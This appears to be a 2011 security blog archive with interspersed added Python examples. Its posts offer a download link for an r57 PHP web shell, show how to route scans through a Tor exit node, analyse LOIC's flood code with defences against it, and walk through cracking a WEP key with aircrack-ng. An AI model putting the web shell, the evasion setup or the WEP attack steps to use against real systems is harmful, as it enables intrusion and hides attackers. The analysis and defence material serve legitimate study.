Thursday, October 20, 2011

Clean r57 PHP Shell

The r57 shell (and others) distributed at http://www.xfocus.net.ru/soft/r57.txt contains a backdoor.

Clean copy can be found here: 

http://pastebin.com/G6W8qqmv

Enjoy.

See the original source for the base64-encoded variables containing JavaScript backdoors. These have been removed in the pastebin copy above.
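Backdoored variables of this kind can be found mechanically. The following Python script is an added example (not part of the original post and not the contents of the pastebin): it pulls every base64-looking string literal assigned to a PHP variable, decodes it and flags any whose decoded content carries a backdoor marker such as a <script> tag or an eval(). The PHP snippet inside it is constructed for the example; the variable names, the example.com URL and the marker list are assumptions, not taken from the real r57 source.

```python
# Added example (not from the original post): find base64-encoded string
# literals in PHP source, decode them and flag likely backdoor payloads.
import base64
import re

# PHP assignment of a base64-looking literal: $name = "Zm9v...";
B64_ASSIGN = re.compile(r'\$(\w+)\s*=\s*["\']([A-Za-z0-9+/]{12,}={0,2})["\']')

# Substrings (matched case-insensitively) that a decoded blob has no
# business containing in a "clean" shell. Assumed list, extend as needed.
MARKERS = (b"<script", b"<iframe", b"eval(", b"document.write",
           b"base64_decode", b"system(", b"passthru(", b"$_post", b"$_get")

def decode_literals(src):
    """Return [(variable name, decoded bytes)] for each base64 literal in src."""
    found = []
    for m in B64_ASSIGN.finditer(src):
        name, blob = m.group(1), m.group(2)
        try:
            found.append((name, base64.b64decode(blob, validate=True)))
        except ValueError:          # binascii.Error: not really base64, skip it
            continue
    return found

def suspicious_literals(src):
    """Variable names whose decoded content contains a backdoor marker."""
    return [name for name, data in decode_literals(src)
            if any(marker in data.lower() for marker in MARKERS)]

# Constructed sample PHP: one harmless base64 literal and one that decodes
# to a remote <script> include, built here so the encoding is exact.
_INJECTED = b'<script src="http://example.com/x.js"></script>'
SAMPLE_PHP = (
    '<?php\n'
    '$banner = "UjU3IHNoZWxs";\n'                                  # "R57 shell"
    '$ad = "' + base64.b64encode(_INJECTED).decode() + '";\n'
    'echo base64_decode($ad);\n'
    '?>\n'
)

if __name__ == "__main__":
    for name, data in decode_literals(SAMPLE_PHP):
        print(f"${name}: {data!r}")
    print("suspicious:", suspicious_literals(SAMPLE_PHP))
```

Run it against the downloaded r57.txt by reading the file into `src` and calling `decode_literals(src)`; anything it decodes is worth reading in full, whether or not a marker fires, since the marker list is only a starting point.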


Computer Biology

Saturday, September 17, 2011

Tor Proxy and Proxychains = Anonymous Internet Operations

The Tor network is an onion-routing overlay: your traffic enters at a guard relay, is bounced through the network and leaves at an exit node, so the destination sees the exit node's IP address rather than your real one.

This article shows how to use torproxy (part of tortunnel) to open a one-hop tunnel directly to a Tor exit node, bypassing the rest of the s-l-o-w Tor network, and then use proxychains so that ordinary applications can use that tunnel and your public IP appears to be that of the exit node. Caveat: a one-hop tunnel gives you the exit node's IP, not Tor's anonymity. The exit node you connect to sees your real IP and can tie it to every connection you make through it, so treat this as an IP-changing proxy, not as Tor.

First we need to get the required applications installed.

Install

I will be using Ubuntu 11.04. You will also need to install:
proxychains
privoxy
tortunnel (contains torproxy, requires boost libraries)
Boost C++ Libraries

From terminal:
sudo apt-get install proxychains privoxy libboost-all-dev

See the notes below if you can't get the Boost libraries installed.

Next, download and save tortunnel:

http://www.thoughtcrime.org/software/tortunnel/
Back to the terminal, then extract and build:

tar -xf tortunnel-0.2.tar.gz
cd tortunnel-0.2
./configure && make

Watch the build output and make sure it all goes well. To confirm torproxy built, run it with no arguments:

./torproxy 

You should get a response:

Usage: ./torproxy <ExitNodeIP>

Configure

Now that everything is installed, we need to configure privoxy and proxychains so that they work with torproxy.

Configure proxychains.

sudo gedit /etc/proxychains.conf 


Comment out the last line with a # and add the line below:

# defaults set to "tor"
#socks4     127.0.0.1 9050
socks5 127.0.0.1 5060

Configure privoxy


sudo gedit /etc/privoxy/config

Find the commented line that says "forward-socks5", uncomment it and change it to look like this (including the trailing period, which tells Privoxy there is no further HTTP parent proxy after the SOCKS hop):


#      To chain Privoxy and Tor, both running on the same system,
#      you would use something like:
#
        forward-socks5   /               127.0.0.1:5060 .
#

Configure torproxy

To connect to an exit node we first need an exit node's IP address.
The tortunnel website points to a directory of Tor routers. Look in the directory for a router whose flags include "Fast", "Exit" and "Valid" (and skip any flagged "BadExit").

A directory of Tor routers is located here:
http://128.31.0.34:9031/tor/status/all



Once you have an exit node IP, run torproxy with that IP and put an & at the end of the command to start it as a background job.
./torproxy <ExitNodeIP> &

You should see a result like this: 
./torproxy 173.254.192.37
torproxy 0.2 by Moxie Marlinspike.
Retrieving directory listing...
Connecting to exit node: 173.254.192.37:443
SSL Connection to node complete.  Setting up circuit.
Connected to Exit Node.  SOCKS proxy ready on 5060.
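Picking an exit node by eye from that directory listing gets old. The following Python script is an added example (not part of the original post and not part of tortunnel): it parses the router-status entries of a Tor network-status document, in which each router has an "r" line (nickname, identity, digest, publication date and time, IP, ORPort, DirPort) followed by an "s" line listing its flags, and returns the routers carrying every flag you require while skipping anything marked BadExit. The status text it runs on is constructed for the example; the nicknames and the 198.51.100.x / 203.0.113.x addresses are made up, and 173.254.192.37 is simply the exit node used in the output above.

```python
# Added example (not from the original post): select Tor exit nodes from a
# network-status listing by their flags, for use as the torproxy argument.
REQUIRED = ("Fast", "Exit", "Valid")

def exit_nodes(status_text, required=REQUIRED):
    """Return [(nickname, ip, orport)] for every router whose flags include
    all of `required` and do not include BadExit. Entries in the document
    are an "r" line followed by an "s" line (dir-spec router-status format)."""
    chosen = []
    current = None                      # router named by the last "r" line
    for line in status_text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "r" and len(parts) >= 9:
            # r <nick> <identity> <digest> <date> <time> <IP> <ORPort> <DirPort>
            current = (parts[1], parts[6], int(parts[7]))
        elif parts[0] == "s" and current is not None:
            flags = set(parts[1:])
            if "BadExit" not in flags and flags.issuperset(required):
                chosen.append(current)
            current = None
    return chosen

# Constructed sample in the same layout as /tor/status/all (identity and
# digest fields are placeholders; they play no part in the selection).
SAMPLE_STATUS = """\
r moria1 AAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBB 2011-09-17 01:00:00 128.31.0.34 9101 9131
s Authority Fast Named Running Stable V2Dir Valid
r goodexit CCCCCCCCCCCCCCCCCCCCCCCCCCC DDDDDDDDDDDDDDDDDDDDDDDDDDD 2011-09-17 01:05:00 173.254.192.37 443 80
s Exit Fast Running Stable Valid
r slowexit EEEEEEEEEEEEEEEEEEEEEEEEEEE FFFFFFFFFFFFFFFFFFFFFFFFFFF 2011-09-17 01:06:00 198.51.100.7 9001 0
s Exit Running Valid
r badexit GGGGGGGGGGGGGGGGGGGGGGGGGGG HHHHHHHHHHHHHHHHHHHHHHHHHHH 2011-09-17 01:07:00 203.0.113.9 9001 0
s BadExit Exit Fast Running Valid
"""

if __name__ == "__main__":
    for nick, ip, orport in exit_nodes(SAMPLE_STATUS):
        print(f"./torproxy {ip}    # {nick}, ORPort {orport}")
```

Feed it the text fetched from the directory URL above and pass the printed IP to torproxy; the ORPort is shown because that is the port torproxy connects to (443 in the output above).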

Use tunnel


Once you see the line "Connected to Exit Node. SOCKS proxy ready on 5060" you can start pushing traffic through that socket.


We configured proxychains to forward traffic to port 5060. Prefix command-line tools with proxychains:

proxychains telnet google.com 80

proxychains ssh user@example.com

proxychains nmap -sT 100.200.100.10

Two caveats. proxychains works by hooking the connect() library call, so only TCP connections go through the tunnel: use nmap's connect scan (-sT) rather than the default SYN scan, which uses raw sockets and would leave from your real IP. Also make sure the proxy_dns option is enabled (uncommented) in /etc/proxychains.conf, otherwise DNS lookups leak straight to your ISP's resolver.

Or you can configure Firefox to run through the Tor exit proxy. Click
Edit > Preferences > Network > Settings

Set "Manual proxy configuration" and enter 127.0.0.1 port 5060 as the SOCKS host (SOCKS v5). To keep DNS lookups in the tunnel as well, set network.proxy.socks_remote_dns to true in about:config. This pushes all Firefox traffic through the Tor exit node. Confirm it by checking whatismyip.com: it should show the IP of the exit node you chose.

Notes
 
You may need to download the Boost C++ libraries directly from their website or SourceForge and install it manually. The release package will have detailed install instructions.



Tuesday, July 5, 2011

Word Frequency Analysis

Simple Bash script used to determine the frequency of words in a text file called "mydatafile".

#!/bin/sh
# Word frequency of "mydatafile": prints the 700 most common words, most frequent last.
cat mydatafile \
        | tr '[:punct:]'  ' ' \
        | tr '[:digit:]'  ' ' \
        | tr -s '[:space:]' '\n' \
        | grep -v '^$' \
        | sort \
        | uniq -c \
        | sort -n \
        | tail -n 700

Line by line walk through of the above script:

First, cat the text file to standard output and pipe it through a few tr commands.
The first tr replaces every punctuation character with a space, the second replaces every digit with a space, and the third (with -s) turns each run of whitespace into a single newline so that every word sits on its own line; the grep drops the empty line that leading whitespace would otherwise produce.

The output is run through sort so that identical words are adjacent, then uniq -c collapses each run into two columns, the count and the word, and sort -n sorts those lines by count in ascending order.

The last line keeps only the 700 most frequent words (the most frequent word is printed last). Note that the counts are case-sensitive: "The" and "the" are tallied separately; add tr 'A-Z' 'a-z' before the sort if you want them merged.

Tuesday, March 8, 2011

Low Orbit Ion Cannon (LOIC) Analysis

The Primordial Weapon of Cyberwar

LOIC is a readily available, open-source application used in DDoS attacks, most notably the 'Anonymous' attacks against Visa, MasterCard and WordPress.
"It's true that most of the operations performed under the Anonymous branding have been relatively unsophisticated, albeit effective: the attacks made on MasterCard and others were distributed denial-of-service attacks using a modified version of the Low Orbit Ion Cannon (LOIC) load-testing tool. The modified LOIC enables the creation of large botnets that each user opts into: the software can be configured to take its instructions from connections to Internet relay chat (IRC) chat servers, allowing attack organizers to remotely control hundreds of slave machines and hence control large-scale attacks that can readily knock websites offline."
(Arstechnica.com)

Once a willing participant hands control over to the IRC channel, LOIC blasts away at the target server with a tight loop of HTTP GET requests, TCP sends or UDP datagrams. One person running the tool is not enough to bring down a web server, which should be able to handle the requests; the denial of service happens when thousands of people run it against the same server at once.

See the links section at the end of this post if you want to read more about the attacks and the 'group' labeled Anonymous.
 

A screen shot of the original LOIC v.1.0.0.0 written by Praetox - Note, this early version does not have the remote IRC control feature.


v.1.1.1.16 - The remote control over IRC feature allows individuals to participate and use their home bandwidth in an attack with no prior 'hacking' knowledge.


The Source

There are two LOIC builds that are popularly downloaded. Many variants exist in the wild, but all are based on the original C# code; LOIC has also been ported to other languages, including Java and JavaScript.


LOIC v.1.0.4
Developed by abatishchev - http://sourceforge.net/projects/loic/

LOIC v.1.1.3
Developed by NewEraCracker - https://github.com/NewEraCracker/LOIC/

 
Each version has two main modules that do most of the 'work' in the application:

HTTPFlooder.cs 
XXPFlooder.cs

As the names imply, these are the two different methods LOIC uses to flood the web server with traffic.

Looking at the source, we can actually see what is happening and the difference between the two popular versions.  


LOIC v.1.0.4 (SourceForge.com)


HTTPFlooder.cs
[...]
byte[] buf = System.Text.Encoding.ASCII.GetBytes(String.Format("GET {0} HTTP/1.0{1}{1}{1}", Subsite, Environment.NewLine));
[...]
socket.Send(buf, SocketFlags.None);
These lines, wrapped in a while loop, build a byte buffer called buf and send it through a socket.

buf is simply the text a client sends to a web server to make a legitimate HTTP/1.0 request for a document (note that there is no Host header and no User-Agent, which makes this version easy to pick out in server logs). Placed in the loop, this seemingly innocent request stops being innocent: one person running it is load-testing, but a few hundred people pointing it at one server can cause real damage.

XXPFlooder.cs
byte[] buf = System.Text.Encoding.ASCII.GetBytes(Data);
[...]

socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); 
socket.Connect(RHost);
[...]
while (IsFlooding)
socket.Send(buf);

[...]

socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);

while (IsFlooding)

socket.SendTo(buf, SocketFlags.None, RHost);

Besides HTTP requests, the first alternative flooding method is the TCP flood, which opens a TCP connection and sends the user-supplied Data string through it, again inside a while loop. The other option is the UDP flood, which does the same with UDP datagrams. The screenshots show the text input field where the user specifies the text sent through the socket.



LOIC v.1.1.3 (GitHub.com)


HTTPFlooder.cs
byte[] buf = System.Text.Encoding.ASCII.GetBytes(String.Format("GET {0}{1} HTTP/1.1{4}Accept: */*{4}User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0){4}{3}Host: {2}{4}{4}{4}", Subsite, ( AllowRandom ? new Functions().RandomString() : null ), Host, (AllowGzip ? "Accept-Encoding: gzip, deflate"+Environment.NewLine : null), Environment.NewLine));

IPEndPoint RHost = new IPEndPoint(System.Net.IPAddress.Parse(IP), Port);

The updated version performs the same HTTP GET, but as HTTP/1.1 with a Host header, a spoofed browser User-Agent (Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)), an optional random string appended to the requested path (AllowRandom, so that no two requests are identical) and an optional Accept-Encoding: gzip, deflate header (AllowGzip). As usual the request is terminated with a blank line (Environment.NewLine twice), just as when you telnet into a web server and make the request by hand.


XXPFlooder.cs 
socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream,ProtocolType.Tcp);

or

socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);

[...]

while (IsFlooding)

buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? new Functions().RandomString() : null) ));

socket.SendTo(buf, SocketFlags.None, RHost);
The XXPFlooder is practically the same, except that this version concatenates the user-supplied text with a random string and sends that through either a TCP or a UDP socket.


Defend your network from a LOIC attack

Proxies and Tor are not used for this kind of attack: the flood would simply overwhelm the proxy or the Tor network. LOIC opens ordinary connections from the participant's own machine, so the source addresses in your logs are the participants' real IPs, just as if each of them had made thousands of legitimate requests. If you are hit by a DDoS, log every connection attempt you possibly can.

Defenses against this type of DDoS attack include:

- Limit the number of requests per IP address per second.
http://www.cyberciti.biz/tips/lighttpd-set-throughput-connections-per-ip.html

- Use firewalls that support layer 7 HTTP inspection.
http://www.cisco.com/en/US/docs/ios_xr_sw/iosxr_r3.5/vfw/configuration/guide/vfc35int.html

- Ingress Filtering
http://en.wikipedia.org/wiki/Ingress_filtering
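A concrete version of the first two items, as an added example that is not part of the original post and not LOIC code: a Python script that runs two checks over web-server access-log lines in the Apache/nginx "combined" format. The first is a per-source sliding-window request-rate check, which catches any LOIC mode because every request arrives from the participant's real address; the second is a signature match on the User-Agent string hard-coded in the v1.1.3 HTTPFlooder.cs excerpt above. The log lines, the threshold of 10 requests per second and the 198.51.100.x / 203.0.113.x / 192.0.2.x addresses are constructed for the example; the lines are assumed to be in time order, as a live log is.

```python
# Added example (not LOIC code, not from the original post): flag flooding
# sources and LOIC-signature requests in "combined" format access logs.
import re
from collections import defaultdict, deque
from datetime import datetime

# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Header hard-coded in LOIC 1.1.3 HTTPFlooder.cs (quoted above).
LOIC_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def flooders(lines, max_requests=10, window_seconds=1.0):
    """IPs that make more than max_requests within any window_seconds span.
    Lines must be in time order; one deque of timestamps is kept per IP."""
    recent = defaultdict(deque)
    flagged = set()
    for rec in filter(None, map(parse, lines)):
        q = recent[rec["ip"]]
        q.append(rec["time"])
        while (q[-1] - q[0]).total_seconds() > window_seconds:
            q.popleft()                       # slide the window forward
        if len(q) > max_requests:
            flagged.add(rec["ip"])
    return flagged

def signature_hits(lines):
    """IPs sending exactly the User-Agent LOIC 1.1.3 uses. Real IE7 on Vista
    sends the same prefix but usually with extra tokens (.NET CLR etc.), so
    treat a hit as a strong hint to combine with the rate check, not proof."""
    return {rec["ip"] for rec in filter(None, map(parse, lines))
            if rec["ua"] == LOIC_UA}

def _line(ip, ts, req, ua):
    return f'{ip} - - [{ts}] "{req}" 200 512 "-" "{ua}"'

# Constructed sample log: 12 LOIC-style hits from one address in a single
# second, two normal requests from another, one bare HTTP/1.0 GET from a third.
SAMPLE_LOG = (
    [_line("198.51.100.23", "08/Mar/2011:12:00:00 +0000",
           f"GET /{i:04x} HTTP/1.1", LOIC_UA) for i in range(12)]
    + [_line("203.0.113.5", "08/Mar/2011:12:00:00 +0000", "GET /index.html HTTP/1.1",
             "Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0"),
       _line("203.0.113.5", "08/Mar/2011:12:00:03 +0000", "GET /style.css HTTP/1.1",
             "Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0"),
       _line("192.0.2.8", "08/Mar/2011:12:00:04 +0000", "GET / HTTP/1.0", "-")]
)

if __name__ == "__main__":
    print("rate limit exceeded:", sorted(flooders(SAMPLE_LOG)))
    print("LOIC user-agent seen:", sorted(signature_hits(SAMPLE_LOG)))
```

The rate check is the one that matters: the v1.0.4 build sends no User-Agent at all (its request is the bare HTTP/1.0 GET in the first excerpt), so a signature on headers alone misses it, while the flood itself is visible in any mode. Tune max_requests to what your own site's legitimate clients actually do before feeding the result to a firewall rule.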


Stats 


LOIC on GitHub: pageview traffic from Dec 2010 to present (Mar 2011). Yes, that's 35K page views in Dec 2010. Operation Avenge Assange was launched in Dec 2010, targeting PayPal, Visa, MasterCard and the Swedish Prosecution Authority. The traffic appears to have fallen off since then.




Have a look at the download statistics for LOIC hosted on SourceForge. Top downloading country: the United States; top OS: Windows. It's staggering that this is an opt-in, point-and-click attack and the source seems to be concentrated in the United States.

http://sourceforge.net/projects/loic/files/loic/stats/map

http://sourceforge.net/projects/loic/files/loic/stats/timeline





Links

- LOIC DDoS Analysis, Wireshark and Snort
http://blog.spiderlabs.com/2011/01/loic-ddos-analysis-and-detection.html

- Operation Payback used LOIC
http://en.wikipedia.org/wiki/Operation_Payback#Tools_and_communication

- DACS Paper on LOIC & Anonymous
http://www.simpleweb.org/reports/loic-report.pdf

- WordPress attacked by LOIC
http://www.eweek.com/c/a/Security/WordPresscom-Hit-by-Extremely-Large-Denial-of-Service-Attack-618818/

- More about LOIC
http://www.p2pnet.net/story/49690



Wednesday, January 26, 2011

802.11 WEP Wireless Hacking

Introduction to WEP and the IV vulnerability

Wired Equivalent Privacy (WEP) is the original 802.11 security protocol, providing both encryption and authentication.

The encryption method is the RC4 stream cipher (designed at RSA). RC4 is keyed with a per-packet 'seed' made by concatenating a 24-bit initialization vector (IV) with the secret shared key; the keystream it produces is XORed with the plaintext to create the ciphertext, and the IV is prepended to the packet in the clear so the receiver can rebuild the same seed.

When connecting to a WEP-secured network you are asked for the secret shared key, which is used both to authenticate clients to the network and to encrypt the traffic.

The weakness in WEP is that the only per-packet variation in the RC4 key is this short, cleartext IV. Every packet exposes its IV and, because the first plaintext bytes (the 802.2 SNAP header) are predictable, its first keystream bytes as well; with only 2^24 possible IVs they repeat on a busy network, and RC4's key scheduling leaks information about the secret key bytes for certain IVs. An attacker who passively collects enough IVs can therefore recover the shared key statistically (the FMS/KoreK and PTW attacks implemented by aircrack-ng) rather than by brute force, and then use it to join the target network.
Note: A standard WEP implementation uses a 40-bit key and a 24-bit IV, giving a 64-bit RC4 key, which is why WEP is sometimes referred to as 40-bit or 64-bit WEP.
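To see what "the IV travels in the clear" costs, here is an added example in Python that is not part of the original post: a textbook RC4 and a WEP-style per-packet key (the 3-byte IV prepended to the 5-byte secret, exactly the 64-bit seed described above) used to encrypt two packets under the same IV. Because both packets then share one keystream, their ciphertexts XOR to the XOR of their plaintexts, and knowing one plaintext hands the eavesdropper the keystream and with it the other packet. The secret key, IV and packet contents are constructed for the example, and the CRC-32 integrity check value that a real WEP frame also carries is left out.

```python
# Added example (not from the original post): RC4 keystream reuse under a
# repeated WEP IV. Key, IV and plaintexts below are constructed.

def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style frame body: cleartext IV || RC4(IV || secret)(plaintext).
    The CRC-32 ICV of a real frame is omitted; it does not change the point."""
    assert len(iv) == 3 and len(secret) == 5, "24-bit IV, 40-bit key"
    return iv + xor(plaintext, rc4(iv + secret, len(plaintext)))

SECRET = bytes.fromhex("0123456789")      # 40-bit shared key (constructed)
IV = bytes.fromhex("a1b2c3")              # 24-bit IV, sent in the clear
P1 = b"GET /index.html HTTP/1.0\r\n"      # plaintext an attacker can guess
P2 = b"POST /login.php HTTP/1.0\r\n"      # same length, unknown to attacker

def keystream_reuse(secret=SECRET, iv=IV, p1=P1, p2=P2):
    """Encrypt p1 and p2 under the same IV; return (IV seen on the wire,
    whether c1^c2 == p1^p2, p2 recovered from c2 using only p1 and c1)."""
    c1 = wep_encrypt(secret, iv, p1)
    c2 = wep_encrypt(secret, iv, p2)
    wire_iv = c1[:3]                          # any sniffer reads this
    same_keystream = xor(c1[3:], c2[3:]) == xor(p1, p2)
    keystream = xor(c1[3:], p1)               # known plaintext -> keystream
    recovered = xor(c2[3:], keystream)        # ... which decrypts packet 2
    return wire_iv, same_keystream, recovered

if __name__ == "__main__":
    wire_iv, reused, recovered = keystream_reuse()
    print("IV on the wire:", wire_iv.hex(), "keystream reused:", reused)
    print("recovered second packet:", recovered)
    print("distinct IVs possible:", 2 ** 24)   # 16,777,216; repeats are inevitable
```

aircrack-ng does not wait for an exact IV collision; the PTW and KoreK attacks it runs gather statistics over many different IVs to recover the key bytes themselves. The collision shown here is the simplest illustration of the same root cause: a 24-bit public IV is the only thing separating one packet's RC4 key from the next.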

Cracking a WEP Key

The purpose of this article is for education and security auditing only. Anyone using this for any other reason are liable for their own actions. 

To see this vulnerability work and to actually crack a WEP key in a test environment you need some tools.
  • A test network using an 802.11 wireless router with WEP enabled and a 40 bit key created. 
  • A Linux machine with a wireless card that supports monitor mode. In this example BackTrack 4 R2 is the operating system used; download a live DVD if you don't have a dedicated machine.
  • macchanger, airmon-ng, airodump-ng and aircrack-ng. These tools are all included in BackTrack 4.

    The following example is a passive WEP attack that observes traffic and collects IVs. In comparison, an active attack involves packet injection to get the access point (AP) to generate more traffic and in turn more IVs; resulting in a faster crack. The passive attack takes significantly longer depending on the traffic volume on the target network. 


    Assuming the wireless interface is wlan0, disable the interface. 
    ifconfig wlan0 down

    Use macchanger to change the MAC address of the wlan0 interface. 
    macchanger --mac 00:11:22:33:44:55 wlan0

    Bring the wlan0 interface back up.
    ifconfig wlan0 up

    Use airmon to create a monitor mode interface for wlan0. The new monitoring interface is called mon0.
    airmon-ng start wlan0

    Run airodump to observe target networks and gather MAC (BSSID), channel and ESSID.
    airodump-ng mon0

    Run airodump again, this time specifying the target channel, the BSSID and the file prefix to write to. This step is where the IVs are collected for the analysis later. Again, since this is a passive attack it may take a while to collect enough IVs; leave the machine running overnight if needed.

    airodump-ng --ivs -c <channel> --bssid <BSSID> -w /root/dumpfile mon0

    Keep an eye on the above command. The #Data column is the number of data frames, and so the number of IVs, collected from the network. If there is little traffic on the network this number increases slowly. Once you have about 20,000 IVs, run aircrack against the file airodump wrote (it appends a sequence number, so the first capture is dumpfile-01.ivs; -n 64 tells aircrack the key is 64 bits):
    aircrack-ng -n 64 /root/dumpfile-01.ivs

    aircrack will report whether it has cracked the WEP key or whether you need to collect more IVs and try again. The number of IVs needed varies, but a 40-bit key can often be recovered with fewer than 20,000 IVs.

    Enjoy.